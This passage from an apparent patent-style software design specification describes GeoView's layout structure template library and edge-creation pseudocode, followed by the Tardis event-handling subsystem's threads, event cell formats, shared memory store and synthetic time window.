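        void insert(Node& n) { n.structure = this; }
    };

    enum class CompositionType { Attachment, Containment };

    // Condensed sketch of the composeObjects precedence rules described above.
    void composeObjects(Node& parent, Node& child, CompositionType type)
    {
        if (child.isComposed())
            return;                                  // already attached-to or located-in
        if (child.isAncestorOf(parent))
            throw std::logic_error("child may not be an ancestor of the parent");

        Structure* childStructure = child.structure; // remember the child's structure
        child.structure = nullptr;                   // the child leaves that structure

        if (type == CompositionType::Attachment)
            parent.attach(child);
        else
            parent.contain(child);

        // If only the child was in a layout structure, the new composition is
        // re-inserted into it; if both were, the parent's structure takes precedence.
        if (childStructure != nullptr && parent.structure == nullptr)
            childStructure->insert(parent);
    }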
5.2.4 Leaf Edge Creation Methods
5.2.4.1 createEdges
Create any new edges that are to be associated with this leaf. During this processing, non visible edges are updated for LSTL components (for example Graph and Tree structures.)
LH_Leaf::createEdges( )
    ITERATE through attributes associated with this leaf
        IF the attribute's name is "IS_CONNECTED_TO"
            Call createEdge( attribute ) [Section 5.2.4.2]
        END IF (name is connected to)
    END ITERATION
5.2.4.2 createEdge
Using the attribute, find the connected-to node. Provided there is no current visible edge to it, create a new one.
LH_Leaf::createEdge( matching attribute )
    SET connectedToNode by using the string value of the passed in attribute
    Call cfGetReference( connectedToNode ) to find the node's leaf instance (if any)
    IF the node is found AND there is no current connection to it
        SET absloc to the absolute location of the current node
        SET conabsloc to the absolute location of the connectedTo node
        Call addEdge( this node, absloc, connectedTo node, conabsloc ) on the
            EdgeSet singleton [Section 5.2.4.4]
        Call addGEdge( edge ) to add any non visible graph edges to this node [Section 5.2.4.5]
    END IF (node found and no current connection)
5.2.4.3 updateEdges
Update edge locations on the basis of this Leaf's location.
LH_Leaf::updateEdges( )
IF the delay processing flag is set
cache the current leaf for edge processing later
END IF (delay processing flag)
ITERATE through each of mEdges
Call setLocation( ) on the edge and make it the absolute
location of this leaf
END ITERATION
IF there is an attached-to structure node
Call updateEdges( ) on the structure node
END IF (attached-to structure node)
IF there is a located-in structure node
Call updateEdges( ) on the structure node
END IF (located-in structure node)
5.2.4.4 addEdge
An edge is added to the EdgeSet singleton.
LH_EdgeSet::addEdge( node1, location1, node2, location2 )
IF currentline modulus 100 yields no remainder
ALLOCATE space for another 100 lines and set them
END IF (modulus 100)
Create a new edge
Add it to mEdges
Check for edge visibility and add it to the appropriate list
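By way of illustration only, the growth policy of addEdge (extending edge storage 100 entries at a time and indexing each new edge by visibility) could be sketched in C++ as follows. The member names are assumptions for this sketch rather than the actual edge set implementation.

    #include <cstddef>
    #include <vector>

    struct Edge
    {
        int node1;
        int node2;
        float loc1[3];
        float loc2[3];
        bool visible;
    };

    // Illustrative sketch of the EdgeSet growth policy from the pseudocode:
    // storage is extended 100 entries at a time, and each new edge is also
    // indexed by visibility.
    class EdgeSetSketch
    {
    public:
        void addEdge(const Edge& e)
        {
            if (mEdges.size() % 100 == 0)                 // no remainder: grow the pool
                mEdges.reserve(mEdges.size() + 100);
            mEdges.push_back(e);
            if (e.visible)
                mVisible.push_back(mEdges.size() - 1);    // index of the new edge
            else
                mHidden.push_back(mEdges.size() - 1);
        }

    private:
        std::vector<Edge> mEdges;
        std::vector<std::size_t> mVisible;                // indices of visible edges
        std::vector<std::size_t> mHidden;                 // indices of non-visible edges
    };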
5.2.4.5 addGEdge
A non-visible edge interconnection is added on the basis of whether there is a common Graph (or graph sub-typed) parent. This keeps edge information for Graph and its descendants in the LSTL up to date.
• LH_Leaf::addGEdge(Edge)
• SET childNode1 via calling getNode1( ) on edge
• SET childNode2 via calling getNode2( ) on edge
• Look for a common graph/tree via calling findCommonSNode( ) on LH_SNode
• Add structure edge to the leaf
5.3 LayoutStructureTemplateLibrary (LSTL) Classes
5.3.1 LSTL Template Class Summary
Table 5 identifies a full list and description of the LSTL classes.
TABLE 5
LSTL Classes
Class name Description
GenericGraph This template class places the objects in a graph.
GenericLine This template class places the objects in a line.
GenericMatrix This template class places objects in a matrix.
GenericRing This template class places objects in a ring.
GenericStar This template class places objects in a star.
GenericRectangle This template class places objects in a rectangle.
GenericTree This template class places objects in a tree.
5.3.2 GenericGraph Methods
5.3.2.1 Node Separation Factor
This value indicates the amount of separation between nodes in the graph (horizontal spacing) relative to a unit value of 1.0.
Values: Positive floating point
Interface: float getNodeSeparationFactor( ) const
void setNodeSeparationFactor(const float val)
5.3.2.2 Rank Separation Factor
Similar to the node separation factor, this value represents the separation between ranks (vertical spacing).
Values: Positive floating point
Interface: float getRankSeparationFactor( ) const
void setRankSeparationFactor(const float val)
5.3.2.3 Orientation
This value determines whether the graph is orientated top-to-bottom or left-to-right.
Values: TOP_TO_BOTTOM, LEFT_TO_RIGHT
Interface: Graph_Orientation_Policy getOrientation( ) const
void setOrientation(const Graph_Orientation_Policy orient)
5.3.3 GenericLine Methods
5.3.3.1 Axis
This determines which axis (x, y or z) the line will be parallel to.
Values: X_AXIS, Y_AXIS, Z_AXIS
Interface: LSTL_LineAxis getAxis( ) const
void setAxis(const LSTL_LineAxis axis)
5.3.3.2 Linear Direction
This determines whether the line extends along the axis in a positive or negative direction.
Values: POSITIVE, NEGATIVE
Interface: LSTL_LinearDirection getDirection( ) const
void setDirection( const LSTL_LinearDirection dir)
5.3.3.3 Origin
This determines whether the origin is located at the front, back or centre of the line.
Values: FIRST, LAST, CENTER
Interface: LSTL_LineOrigin getOrigin( ) const
void setOrigin( const LSTL_LineOrigin origin)
5.3.3.4 Separation
This is the amount of spacing the algorithm leaves between each object in the line.
Values: Positive floating point
Interface: float getSeparation( ) const
void setSeparation( const float sep)
5.3.4 GenericMatrix Methods
5.3.4.1 Width Separation
This is the amount of space in the X axis that is left between objects in the matrix.
Values: Positive floating point
Interface: float getWidthSeparation( ) const
void setWidthSeparation( const float sep)
5.3.4.2 Depth Separation
This is the amount of space in the Z axis that is left between objects in the matrix.
Values: Positive floating point
Interface: float getDepthSeparation( ) const
void setDepthSeparation( const float sep)
5.3.4.3 Delete Policy
This determines what the algorithm will do when an object is removed from the matrix. It can either leave a gap, fill in the gap with the last object or shuffle back all of the objects after the gap.
Values: LEAVE_GAP, FILL_GAP_FROM_END, SHUFFLE
Interface: LSTL_deletePolicy getDeletePolicy( ) const
void setDeletePolicy( const LSTL_deletePolicy policy)
5.3.4.4 Origin Policy
Determines where the true centre of the matrix is located, either where the first object in the matrix is placed or at the true centre.
Values: FIRST, CENTER
Interface: LSTL_OriginPolicy getOriginPolicy( ) const
void setOriginPolicy( const LSTL_OriginPolicy policy)
5.3.5 GenericRing Methods
5.3.5.1 Angular Direction
This determines the direction in which objects are placed on the ring. It can be either clockwise or anti-clockwise.
Values: CLOCKWISE, ANTI-CLOCKWISE
Interface: LSTL_AngularDirection getDirection( ) const
void setDirection( const LSTL_AngularDirection dir)
5.3.5.2 Radius
This is a minimum radius for the ring. The algorithm determines a dynamic radius based on object size and separation; the larger of the dynamic radius and the user-specified radius is used.
Values: Positive floating point
Interface: float getRadius( ) const
void setRadius( const float radius)
5.3.5.3 Separation
The amount of separation to leave between objects. The greater the separation the greater the dynamic radius of the resulting ring.
Values: Positive floating point
Interface: float getNodeSeparation( ) const
void setNodeSeparation( const float nodeSeparation)
5.3.6 GenericStar Methods
5.3.6.1 Root Height
This is the amount that the root of the star is raised above the plane.
Values: Positive floating point
Interface: float getRootHeight( ) const
void setRootHeight( float rootHeight)
5.3.7 GenericRectangle Methods
5.3.7.1 Angular Direction
The direction (clockwise or anti-clockwise) in which objects are placed around the rectangle.
Values: CLOCKWISE, ANTI-CLOCKWISE
Interface: LSTL_AngularDirection getDirection( ) const
void setDirection( const LSTL_AngularDirection ang)
5.3.7.2 Start Side
The side on which to start layout. The sides are numbered 0-3 with 0 being the top (far) side and subsequent sides extending clockwise.
Values: Integral range [0 . . . 3]
Interface: int getStartSide( ) const
void setStartSide( int startSide)
5.3.7.3 Width Separation
The separation between objects in the width axis.
Values: Positive floating point
Interface: float getWidthSeparation( ) const
void setWidthSeparation( const float widthSeparation)
5.3.7.4 Depth Separation
The separation between objects in the depth axis.
Values: Positive floating point
Interface: float getDepthSeparation( ) const
void setDepthSeparation( const float depthSeparation)
5.3.7.5 Width
Specifies the width dimension of the resulting rectangle.
Values: Positive floating point
Interface: float getWidth( ) const
void setWidth( const float width)
5.3.7.6 Depth
This specifies the depth dimension of the resulting rectangle.
Values: Positive floating point
Interface: float getDepth( ) const
void setDepth( const float depth)
5.3.8 LSTL Class Interface
Each of the classes in the LSTL defines a common interface as shown in Table 6.
TABLE 6
LSTL Class Interface
Method                              Description
iterator getFirst( ) const          Get an iterator to the first object in the
                                    structure. NOTE: The type of iterator is
                                    defined in the class itself. Currently it
                                    is vector<T*>. Use
                                    GenericStructure<Foo>::iterator as the
                                    type may change.
iterator getLast( ) const           Get an iterator to the last object in the
                                    structure.
const_iterator getFirstConst( )     Return constant iterator to beginning of
  const                             children.
const_iterator getLastConst( )      Return constant iterator to end of
  const                             children.
int getNumChildren( ) const         Get the number of objects in the
                                    structure.
void insert(T* element)             Insert the given object into the
                                    structure. Layout will be called if
                                    doLayout is true (this is the default).
void relativePlacement( )           Perform layout on the objects in the
                                    structure.
void remove(T* element)             Remove an object from the structure.
                                    Layout will be called if doLayout is true
                                    (this is the default).
void set<ATTRIBUTE>(arg)            Set the appropriate attribute.
get<ATTRIBUTE>( )                   Get the appropriate attribute.
Each structure may have additional methods that only apply to it. More details can be found by looking at the interface of a particular class in automatically generated documentation or the header files.
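By way of illustration only, the following cut-down C++ template shows how the common interface of Table 6 fits together for a line-shaped structure. It is not the real GenericLine; the layout performed in relativePlacement is simply a placement along the X axis that honours each object's bounds radius and the separation setting. T must provide the interface of Table 7.

    #include <vector>

    // Cut-down illustration of the Table 6 interface; NOT the real GenericLine.
    template <typename T>
    class GenericLineSketch
    {
    public:
        typedef typename std::vector<T*>::iterator iterator;

        iterator getFirst()              { return mChildren.begin(); }
        iterator getLast()               { return mChildren.end(); }
        int getNumChildren() const       { return static_cast<int>(mChildren.size()); }

        void setSeparation(const float sep) { mSeparation = sep; }
        float getSeparation() const         { return mSeparation; }

        void insert(T* element, bool doLayout = true)
        {
            mChildren.push_back(element);            // pointers only; not owned
            if (doLayout) relativePlacement();
        }

        void remove(T* element, bool doLayout = true)
        {
            for (iterator it = mChildren.begin(); it != mChildren.end(); ++it)
                if (*it == element) { mChildren.erase(it); break; }
            if (doLayout) relativePlacement();
        }

        // Place children along the X axis, honouring bounds radii and separation.
        void relativePlacement()
        {
            float x = 0.0f;
            for (iterator it = mChildren.begin(); it != mChildren.end(); ++it) {
                const float r = (*it)->getBoundsRadius();
                x += r;                              // advance to this object's centre
                (*it)->setLocation(x, 0.0f, 0.0f);
                x += r + mSeparation;                // leave room before the next object
            }
        }

    private:
        std::vector<T*> mChildren;                   // not owned (see Section 5.3.8.1)
        float mSeparation = 1.0f;
    };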
5.3.8.1 Memory Allocation
The template classes are not responsible for memory allocation/de-allocation of the T* objects. In the user's application the T objects should be maintained and pointers passed to the structure templates. The application will be responsible for complete control of the T objects.
5.3.8.2 Relative Placement
It is up to the user of the template object instance to call relativePlacement( ) when they want the layout algorithm to run for a particular layout structure. The layout algorithms will use the templated objects' getBoundsRadius( ) call to ensure no overlap of the objects that are being placed.
5.3.9 T Interface
The object for instantiating a LSTL class must provide the interface as shown in Table 7.
TABLE 7
T Interface
Method                                   Description
void setLocation( float x, float y,      Each layout algorithm will call this
  float z )                              method in order to set the location
                                         for each object.
void getLocation( float& x, float& y,    The current location of the object.
  float& z )
char* getId( )                           A unique identifier for the object.
float getBoundsRadius( )                 Each algorithm will take into account
                                         the size of each object in the
                                         structure when laying them out. This
                                         call should return the radius of a
                                         sphere which completely encompasses
                                         the object.
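By way of illustration only, a class satisfying the T interface of Table 7 might be sketched as follows; the class name SketchNode and its members are assumptions. An instance of such a class could then be handed to any of the LSTL templates (for example GenericRing<SketchNode>), with the application retaining ownership of the objects as noted in Section 5.3.8.1.

    // Illustrative class satisfying the T interface of Table 7.
    class SketchNode
    {
    public:
        SketchNode(const char* id, float boundsRadius)
            : mId(id), mRadius(boundsRadius), mX(0.0f), mY(0.0f), mZ(0.0f) {}

        void setLocation(float x, float y, float z) { mX = x; mY = y; mZ = z; }
        void getLocation(float& x, float& y, float& z) { x = mX; y = mY; z = mZ; }
        const char* getId() { return mId; }
        float getBoundsRadius() { return mRadius; }

    private:
        const char* mId;     // unique identifier
        float mRadius;       // radius of the enclosing sphere
        float mX, mY, mZ;    // current location set by the layout algorithm
    };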
6. Appendix for GeoView
This section contains a glossary to the SDD for the GeoView module. It contains abbreviations and definitions of terms used in the SDD.
6.1 Abbreviations
The following are abbreviations used in this document.
Term/Acronym Meaning
CCI Component Control Interface
CSCI Computer Software Configuration Item
DID Data Item Description
LRA Layout Rule Argument
LSTL Layout Structure Template Library
SDD Software Design Description
SSDD System/Subsystem Design Description
SSS System/Subsystem Specification
6.2 Definition of Terms
The following are terms used in this document.
Term Description
Address A character string uniquely identifying the event and
operation.
Attachment A child object in an attached-to relationship with a
parent object.
Attributes String representations of the facets of a world object
or relationships to other world objects.
Batching Grouping of two or more events.
Bounds Radius The radius of influence about an object in GeoView.
Building The act of giving information to the renderer to
render a leaf node.
Composition Two or more objects in an attached-to or located-in
relationship.
Configuration Item The base level abstract class that holds the name
of an object and methods for insertion, deletion
and lookup of other objects.
Containment A child object in a located-in relationship with
a parent object.
Edge A physical line interconnecting two leaf nodes.
Events External information arriving in the form of
network objects.
Layout The act of combining the processes of leaf building,
layout rule application, edge creation and object
placement.
Layout Rules Rules specifying the attachment, containment or
layout structure grouping of a leaf node
(representing a world object) based on its
attributes.
Layout Structure A logical grouping construct that does placement on
child leaves based on the shape of the structure.
Leaf Node GeoView's graphical building blocks representing
objects in the world.
MasterTable A hierarchical set of mappings from world objects
to leaf nodes specifying visual attributes and
layout rules.
Network Object A container of one or more attributes.
Node The abstract base parent of layout hierarchy classes.
Object Represents either a leaf or layout structure in
GeoView.
Parent The node directly above the current one in the
layout hierarchy.
Placement The act of placing an object in the GeoView
Universe either absolutely or relatively.
Relationship A string describing the logical connection
between two leaf nodes.
Root The singleton instance at the top of the layout
hierarchy.
Scene Graph The Java 3D API data structure for rendering in 3D
worlds.
Singleton Recognised design pattern that is used to create a
class that is guaranteed to have only one object
instance in the application.
Structure A Layout Structure that is a direct child of the
top-level structure
Sub-structure A Layout Structure that is a direct child of a
parent leaf node. Used for grouping leaf nodes
that are in a composite with the parent leaf node.
Top Level The top most structure level of the layout hierarchy
where the parent structure is the top level structure.
World Objects Physical or logical objects that exist or are defined
in the real world, e.g. Computer, Shared Data Link.
PART 5 TARDIS SPECIFICATION
1. Tardis Specification
Tardis is briefly discussed in Section 2.1.4 of the Shapes Vector Overview, Part 1 of this specification.
The following is a preferred specification of its characteristics in the embodiment described. However, it is also possible for the Tardis to operate independently and/or in conjunction with other elements not related to elements of the preferred embodiment.
It is possible for the Tardis to operate with just the Gestalt or just one observation sub-system such as GeoView or DataView. It is also possible to construct configurations of the Shapes Vector system in which the event outputs from agents are fed via the Tardis to a third-party visualisation or analysis system, or to a text-based event display. In cases where time-based queuing and semantic filtering of events is not required, the system could alternatively be configured such that the event outputs from agents are delivered directly to one or more of the view components in a real time visualisation system.
1.1 Introduction
The Tardis is the event handling sub-system of Shapes Vector. It manages incoming events from a system Client, in a typical arrangement the Gestalt, and makes them available for Monitors (a recipient observation sub-system) to read. There can be many Clients and Monitors connected to the Tardis at the same time.
The Tardis receives events from Clients via connections through Tardis Input Portals, and uses Shared Memory as its form of inter-process communication with Monitors. Tardis Input Portals support different types of connections, such as socket transaction.
The flow of data through the Tardis is in one direction only, the Tardis reads from the connections with the Clients, and writes to Shared Memory.
1.2 Assumptions
For the purpose of this disclosure of a preferred embodiment, it is assumed that the reader is familiar with the products, environments and concepts that are used with the Shapes Vector infrastructure disclosed earlier in this specification.
2. Overview of the Tardis
The Tardis receives events from one or more Clients/Sources, which can be located physically close to or remote from the Tardis, and supplies them to Recipient Systems that can also be remotely located. A Recipient system may also be a Client/Source. Each Client/Source associates with each event an ordered data value that is, in an embodiment, one of an incrementing series of data values. Typically the ordered data value is representative of real or synthetic time as gauged from an agreed epoch. Since a data value can be compared with other data values, it is useful for ordering events within a common queue (the term slot is also used in this specification to describe the function of a queue). Since different events in different queues can have the same data value, they can be identified or grouped to provide a temporal view of the events that does not have to be a real time view. For example, by creating one or more spans, or changing the magnitude of the span, of the data values output by the Tardis it is possible to provide control over time and then present events to the Recipient systems relating to those times. The timed event output to a Recipient system could be in synchronisation with real time, if desired by the user observing the Recipient system output. It is also possible to change the rate of flow of the data values selected for output from the Tardis, thus controlling the time span over which those events are presented for observation. There may be triggers available to initiate one or more time related outputs that can be set by the observing user to assist their detection of predetermined events. Further, the triggers and their effect may be determined by way of calculations on data values set by the user of the system. Not all events are of the highest importance, hence there is a means by which a different priority can be allocated to each event and handled by the Tardis, so that an event's priority determines its order of output from the Tardis and/or whether the event can be discarded under certain circumstances, such as when the system is under extreme load. The unify bit described in this specification is an embodiment of the event prioritization system.
There is an agreed semantic associated with each event and there will exist in Tardis a slot for each semantic.
2.1 Components
The Tardis uses several different threads during execution, each fulfilling different roles within the Tardis. There is the Tardis Master Thread (M Thread), a set of Event Processing Threads (X Threads), a set of Update Threads (Y Threads), a set of New Connection Threads (Z Threads) and a set of Control Socket Threads (C Threads).
The Tardis is composed of various data structures, such as the Tardis Store, Slots, Cells, Cell Pools and their Managers.
2.2 Overview of Operation
As the M Thread starts, it creates a set of Input Portals, which represent the conduits through which Clients send events to the Tardis. Each Input Portal creates a Z Thread to manage new connections for the Input Portal. The M Thread then creates a set of X Threads (as many as specified by the user) and a set of Y Threads (as many as specified by the user). It also creates some C Threads for communication with external processes via CCI (Component Control Interface), and creates the Tardis Store. Note that the Tardis is a process, which contains many threads, including the original thread created by the process, the M Thread.
The X Threads grab events coming in from the Input Portal Connections and place them in their corresponding queues in the Tardis Store. The Tardis Store resides in shared memory. When a clock tick occurs, an update begins, which requires the Y Threads to update the preferred double buffered event lists (there are write lists and read lists, which switch every update, giving double buffered behaviour). When a switch occurs, a new set of event lists is presented to the Monitors.
The Tardis is able to accept a specified set of instructions/requests from external entities through any one of its CCIs. This functionality is provided via the C Threads, providing external control and instrumentation for the Tardis.
3. Tardis Concepts
3.1 Events
An event is used to represent the fact that some occurrence of significance has taken place within the system, and may have some data associated with it. There is a global allocation of event identifiers to events with associated semantics in the system.
Conceptually, all events in the Tardis are the same, but in implementation, there are two event formats. The first is an incoming (or network) event, as received by the Tardis via an Input Portal Connection from Clients. This event consists of an identifier, a timestamp, an auxiliary field and a variable length data field. The auxiliary field contains the event's unify flag, type, the length of the event's data (in bytes) and some unused space.
The second event format is an Event Cell, as used within the Tardis and read by Monitors. Event Cells share some of the fields of an incoming event. They have a Cell Pool Manager pointer (which points to the Cell Pool Manager who manages the cell), a next cell and previous cell index (to link with other Event Cells), a first Data Cell index (to link with a Data Cell), a timestamp, an auxiliary field (same content as for an incoming event) and a fixed size data field.
The Cell Pool Manager pointer is used when placing a cell back into a free cell list (within the relevant Cell Pool Manager). The next cell index is used when the cell is in a free cell list, a data Cell list or an Event Cell queue or list. The previous Event Cell index is used when the Event Cell is in an Event Cell queue. The only other difference between a network event and an Event Cell is that an Event Cell has a fixed size data field and a first Data Cell index instead of a variable length data field. For reasons of efficient storage, the first part of the variable length data field is placed in the fixed size data field of the Event Cell. The rest is placed in a sequence of Data Cells which each point (via an index, not an address) to the next Data Cell, with the last possibly being partially filled. The first of the sequence of Data Cells is pointed to by the first Data Cell index.
The identifier, auxiliary field and timestamp are 64 bits each, with the timestamp being conceptually divided into two 32 bit quantities. Within the auxiliary field, the unify flag is 1 bit, the type is 4 bits and the data length is 16 bits (the data length is expressed in bytes, allowing up to 64 KB of data to accompany each event). This leaves 43 bits of unused space in the auxiliary field.
The cell indices are all 32 bit (allowing a Cell Pool with more than four billion cells). The size of the fixed size data field is to be specified at compile time, but should be a multiple of 64 bits.
For strong reasons of efficiency and performance, Event Cells and Data Cells are stored together in common pools and are the same size. The format of a cell (Event and Data Cell) is shown in FIG. 23.
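By way of illustration only, the cell layout described above could be expressed in C++ as sketched below. The field ordering, the size of the fixed data field and the bit positions within the auxiliary field are assumptions for this sketch; only the stated widths (64-bit identifier, timestamp and auxiliary word, 32-bit cell indices, 1-bit unify flag, 4-bit type and 16-bit data length) come from the design.

    #include <cstddef>
    #include <cstdint>

    // Illustrative cell layout; not the actual in-memory format.
    const std::size_t kFixedDataWords = 4;          // fixed data field, a multiple of 64 bits

    struct CellPoolManager;                         // forward declaration

    struct Cell
    {
        CellPoolManager* poolManager;               // owner, for return to its free cell list
        std::uint32_t    nextCell;                  // index: free list, Data Cell chain or queue
        std::uint32_t    prevCell;                  // index: Event Cell queue only
        std::uint32_t    firstDataCell;             // index of the first overflow Data Cell
        std::uint64_t    id;                        // event identifier
        std::uint64_t    timestamp;                 // seconds and nanoseconds since the epoch
        std::uint64_t    aux;                       // unify flag, type and data length
        std::uint64_t    data[kFixedDataWords];     // first part of the event data
    };

    // Auxiliary-field accessors using the stated widths (1 + 4 + 16 bits used,
    // 43 bits spare); the chosen bit positions are an assumption.
    inline bool     unifyFlag(std::uint64_t aux)  { return ((aux >> 63) & 0x1) != 0; }
    inline unsigned eventType(std::uint64_t aux)  { return static_cast<unsigned>((aux >> 59) & 0xF); }
    inline unsigned dataLength(std::uint64_t aux) { return static_cast<unsigned>((aux >> 43) & 0xFFFF); }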
The following are examples of some events:
• 1. object information (one event id for each type of object)
• signal that a new object has been discovered or that an update of the attributes of the object is available.
• 2. object attribute information (again one event id for each type of object)
• signal that there is new or updated information for an object attribute.
3.2 TimeStamp
The timestamp indicates the time at which the event was generated at the source. It consists of two 32-bit quantities indicating with second and nanosecond components the elapsed time since 00:00 Universal Time (UT) 1 Jan. 1970. Note that specifying this in terms of Universal Time allays any potential problems with events from different time zones. The timestamp is read but not modified by the Tardis. It is stored as a single 64-bit quantity, and should be stored so that the Tardis can compare timestamps using a single 64-bit instruction. The Clients are responsible for ensuring the timestamp is in an appropriate format.
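By way of illustration only, packing the two 32-bit components into the single 64-bit timestamp so that one 64-bit integer comparison orders events correctly could be sketched as follows; the exact packing used by the Clients is an assumption.

    #include <cstdint>

    // Illustrative packing: seconds in the high word, nanoseconds in the low word.
    inline std::uint64_t packTimestamp(std::uint32_t seconds, std::uint32_t nanoseconds)
    {
        return (static_cast<std::uint64_t>(seconds) << 32) | nanoseconds;
    }

    inline bool earlier(std::uint64_t a, std::uint64_t b)
    {
        return a < b;    // one 64-bit compare, as required by the Tardis
    }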
3.3 Shared Memory
The Tardis creates a shared memory segment during start-up. This is so that the Tardis and a number of Monitor processes have fast access to the Tardis Store, which contains all the structures relevant to the Monitors as depicted in FIG. 24.
3.4 Time
Dealing with time within Shapes Vector is complex and raises many issues. The issues range from the relatively simple issue of having to deal with different time zones (from sensors distributed about the place), to synthetic time and its relationship with events in the Tardis.
3.4.1 Universal Time
In order for events to be collated and assessed there needs to be a global clock or frame of reference for time with which events can be time encoded. The standard Universal Time (UT) is an obvious candidate for such a frame of reference.
3.4.2 Synthetic Time
Synthetic time is closely associated with the read lists. The actual synthetic time indicates the time associated with the read lists as read by the Monitors.
The Tardis maintains a Synthetic Time Window, which has a width (the amount of synthetic time between the beginning and end of the window) and a velocity (the amount of synthetic time the window moves by after each clock tick). The front edge (towards the future) of the window represents the Current Synthetic Time. Synthetic Time and the Synthetic Time Window are shown in FIG. 25.
Updates occur at every clock tick. During the update process, the Y Threads use the Synthetic Time Window to process events. Note that the Synthetic Time Window has no relation with real time, and has no bearing on the amount of real time between updates, since the timing of an update is controlled by an external clock mechanism.
The Synthetic Time Window is used to guide the processing of events.
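By way of illustration only, the Synthetic Time Window can be sketched as a width and a velocity advanced on each clock tick, with a membership test that the Y Threads could apply to an event's timestamp. The member names are assumptions for this sketch.

    #include <cstdint>

    // Illustrative sketch of the Synthetic Time Window.
    struct SyntheticTimeWindow
    {
        std::uint64_t currentTime;   // front (future) edge = Current Synthetic Time
        std::uint64_t width;         // synthetic time between back and front edges
        std::uint64_t velocity;      // synthetic time the window moves per clock tick

        void tick() { currentTime += velocity; }

        bool contains(std::uint64_t eventTime) const
        {
            const std::uint64_t backEdge = (width > currentTime) ? 0 : currentTime - width;
            return eventTime > backEdge && eventTime <= currentTime;
        }
    };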
3.5 Process and Thread Activity
The Monitors and Clients operate independently of the Tardis in different processes. The Tardis process consists of several different types of Threads, whose behaviour needs to be controlled to protect shared data.
In order to control the threads, the MThread needs to be able to signal some threads to engage and to disengage. In order to ensure a thread has disengaged, the MThread needs to signal the thread to disengage, and then confirm a response from the thread indicating it has indeed disengaged. This introduces a problem, in that the MThread may signal a thread to disengage, but the thread in question may be busy, and will not check to see if it should disengage in a timely fashion. In this event, the M Thread will be wasting time waiting for the response. In some cases, this is unavoidable, however, the thread may be engaged in an activity which is thread safe. If this is the case, the MThread should not wait for a response from the thread, and can continue safely, so long as the busy thread checks to see if it should disengage before engaging in thread unsafe activity.
Hence each thread should have a flag it maintains indicating whether it is engaged or not. It should also have a flag it maintains indicating whether it is safely engaged or not. Finally, the M Thread should maintain a flag per type of thread it controls (ie; one for X Threads, one for Y Threads and one for Z Threads).
4. Functional Overview of the Tardis
4.1 Tardis Threads
The Tardis is made up of several different types of threads which work together to make the Tardis function. The M Thread is the master thread, and controls the other threads and the update process. X Threads have the job of reading events from the Input Portals, obtaining and populating Event and Data Cells and placing the Event Cells in the appropriate Slot's queue. Y Threads are called on during every update to take certain Event Cells from a Slot's queue, and to place them in the Slot's event list. Z Threads are responsible for creating new connections with Clients through the Input Portals. C Threads are responsible for handling CCI commands and requests.
This is shown in FIG. 26.
Note that the M Thread is the only thread that directly interacts with another thread.
The scheduling of these threads is important, and revolves around an update, which occurs when a clock tick occurs. When the Tardis is not doing an update, the X Threads are handling incoming events and the Z Threads are handling new connections. When an update occurs, the X and Z Threads are disengaged and the Y Threads engaged to update the event lists. At the end of an update, the Y threads are disengaged and the X and Z Threads engaged again.
The M Thread and the C Threads are never disengaged.
FIG. 27 shows when each thread and process is waiting (to be engaged or for the M Thread, for a clock tick). The shaded areas show where the thread or process is not waiting.
The shaded areas represent time periods where:
Client processes are possibly sending events throughout the time they are connected to the Tardis. The Tardis does not have an effect on the process activity of Clients or Monitors. Note that a Client may produce a burst of events and then shutdown, or it may run for an extended period of time, possibly sending events continually or sporadically.
Monitors are able to read the current read lists. They are able to detect any event list switching during reading. Note that if the Monitors finish their processing of the read lists and cells, they wait until the next update to go into action again.
The Tardis is receiving events from Clients and making events available to Monitors.
The M Thread is controlling an update.
The X Threads are engaged and busy storing incoming events. They are also detecting Input Portal Connections that have timed out and adding them to their own “to-remove” lists of Input Portal Connections.
Y Threads are updating the next read lists (the current write lists) and discarding old non-unified events.
Z Threads are accepting Client requests for new Input Portal Connections. They are also creating new Input Portal Connections and placing them in their own “to-add” lists of Input Portal Connections.
C Threads are servicing requests and commands received via CCI.
The X Threads loop through Input Portal Connections, and collect ones which timeout, but do not modify the list of Input Portal Connections. The Z Threads create new Input Portal Connections, but also do not modify the list. This is to avoid X and Z Threads blocking each other over access to the shared list. However, whilst both are disengaged, the to-add and to-remove lists each maintained are used to modify the shared list.
4.2 Tardis Operation
Upon start-up, the MThread creates the shared memory segment, creates a set of Input Portals (and a Z Thread per Input Portal), creates a number of X Threads and Y Threads and then sits in a loop. When a new Client requests an input connection on an Input Portal, the Z Thread for that Input Portal creates an Input Portal Connection object which is later added to the M Thread's Input Portal Connection list.
The Tardis has a number of X Threads responsible for the management of incoming events. X Threads grab events from Input Portal Connections, so each Input Portal Connection needs to be protected by a lock. These events are stored directly into the event queue of the appropriate Slot by the X Threads, so each Slot needs to be protected by a lock. Hence an X Thread can be blocked attempting to get the lock on an Input Portal Connection, and then on the resulting Slot. This should be expected, and by having many X Threads, such blocking need not significantly affect performance (the more X Threads there are, the more blocking will occur, but it will be less significant because other X Threads will use the time constructively).
When a clock tick occurs, the M Thread begins an update. First it flags the X Threads and Z Threads to disengage and ensures they are disengaged or safely executing. Then it signals the Y Threads to engage. When the Y Threads have finished the update, they are disengaged and the X and Z Threads are engaged.
The MThread then updates the current synthetic time, switches the event lists, increments the update counter and prepares the write lists for writing (discarding events in the write lists, which have been read by Monitors). The order of the last operations is critical as the current synthetic time must be updated before the event lists are switched which must be done before incrementing the update counter. The order is used by the Monitors to detect a switch and preserve data integrity.
The Tardis uses multiple Z Threads (one per Input Portal) to accept new Client requests for an Input Portal Connection. For the purpose of protecting data from being written to whilst being read, or written to simultaneously, the Z Threads are placed in a wait state at the same time as the X Threads, and started again at the same time as the X Threads. This means that at any one time, either the Z Threads or the M Thread has access to the Z Threads' to-add lists.
However, the Z Threads may be blocked whilst accepting new connections, so the Z Threads indicate if they are in a safely executing state. The Z Threads relieve from the MThread the job of accepting and creating new connections, which leaves the M Thread better able to maintain responsiveness.
The X and Y Threads may also declare themselves as safely executing in order to reduce the latency that comes with waiting for all X or Y Threads to disengage.
4.3 Tardis Store
FIG. 28 gives an overview of the array of Slots residing within the Tardis Store in shared memory. Each Slot has an index to the first and last Event Cells in its Event Cell queue. It also has an index to the first event in the read and write lists. All Event Cells and Data Cells are from a Cell Pool, although which pool does not matter.
